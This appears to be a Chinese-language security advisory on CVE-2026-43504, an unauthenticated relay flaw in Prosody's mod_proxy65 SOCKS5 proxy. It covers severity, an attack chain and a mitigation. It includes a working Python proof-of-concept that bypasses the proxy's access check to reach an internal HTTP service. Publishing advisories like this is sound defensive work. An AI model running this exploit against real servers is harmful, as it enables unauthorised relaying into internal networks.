CVE-2026-43504 CVSS 6.5 中危

CVE-2026-43504 Prosody访问控制不当漏洞

披露日期: 2026-05-01

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-43504

漏洞类型

访问控制绕过

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Prosody

漏洞概述

Prosody是一款轻量级XMPP服务器。该漏洞存在于mod_proxy65模块，当模块处于暂停状态时，由于访问校验逻辑存在缺陷，导致未授权用户可以中继网络流量。攻击者无需进行身份认证即可利用此漏洞，可能造成资源滥用或数据传输完整性受损，属于中危风险。

技术细节

该漏洞的核心在于Prosody的mod_proxy65组件在处理SOCKS5连接时的逻辑错误。mod_proxy65通常用于协助XMPP客户端之间建立直接连接（通过字节流代理）。当连接处于特定“暂停”阶段时，模块未能严格验证请求者的身份凭证。这意味着攻击者可以直接向代理端口发送SOCKS5握手请求，并利用代理转发数据到任意目标，而无需完成正常的XMPP认证流程。虽然CVSS向量显示机密性影响为无（C:N），但攻击者利用此漏洞可消耗服务器带宽（A:L）或篡改传输数据（I:L）。由于利用门槛低（无需认证、无需用户交互），该漏洞在公网环境下具有较高的可利用性。

攻击链分析

STEP 1

侦察

攻击者扫描网络，识别出启用了mod_proxy65模块的Prosody服务器，并确定其监听端口。

STEP 2

利用

攻击者在未经过XMPP身份认证的情况下，直接连接到mod_proxy65的SOCKS5代理端口。

STEP 3

中继

利用漏洞绕过访问控制检查，通过代理服务器向内部或外部目标转发网络流量。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# PoC for CVE-2026-43504: Prosody mod_proxy65 Unauthenticated Relay
import socket
import struct

def connect_proxy(host, port):
    # SOCKS5 handshake (No Auth)
    # CONNECT command (0x01) to target
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
        
        # Send SOCKS5 Greeting
        s.send(b"\x05\x01\x00")
        response = s.recv(2)
        if response != b"\x05\x00":
            print("[-] SOCKS5 handshake failed")
            return
            
        # Send CONNECT request to 127.0.0.1:80 (Example target)
        # ATYP: IPV4 (0x01), DST.ADDR: 127.0.0.1, DST.PORT: 80
        req = b"\x05\x01\x00\x01" + socket.inet_aton("127.0.0.1") + struct.pack(">H", 80)
        s.send(req)
        resp = s.recv(10)
        
        if resp[0] == 0x05 and resp[1] == 0x00:
            print("[+] Connection relayed successfully (Access Control Bypass)")
            # Send dummy HTTP request
            s.send(b"GET / HTTP/1.1\r\nHost: 127.0.0.1\r\n\r\n")
            print(s.recv(1024).decode())
        else:
            print("[-] Connection rejected by proxy")
        s.close()
    except Exception as e:
        print(f"Error: {e}")

if __name__ == "__main__":
    # Replace with target Prosody server IP and mod_proxy65 port
    target_host = "192.168.1.100"
    target_port = 5000 # Default mod_proxy65 port often varies, check config
    connect_proxy(target_host, target_port)

影响范围

Prosody < 0.12.6

Prosody 1.0.0 - 13.0.0 (before 13.0.5)

防御指南

临时缓解措施

若无法立即升级，建议暂时禁用mod_proxy65模块以防止未经认证的流量中继。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表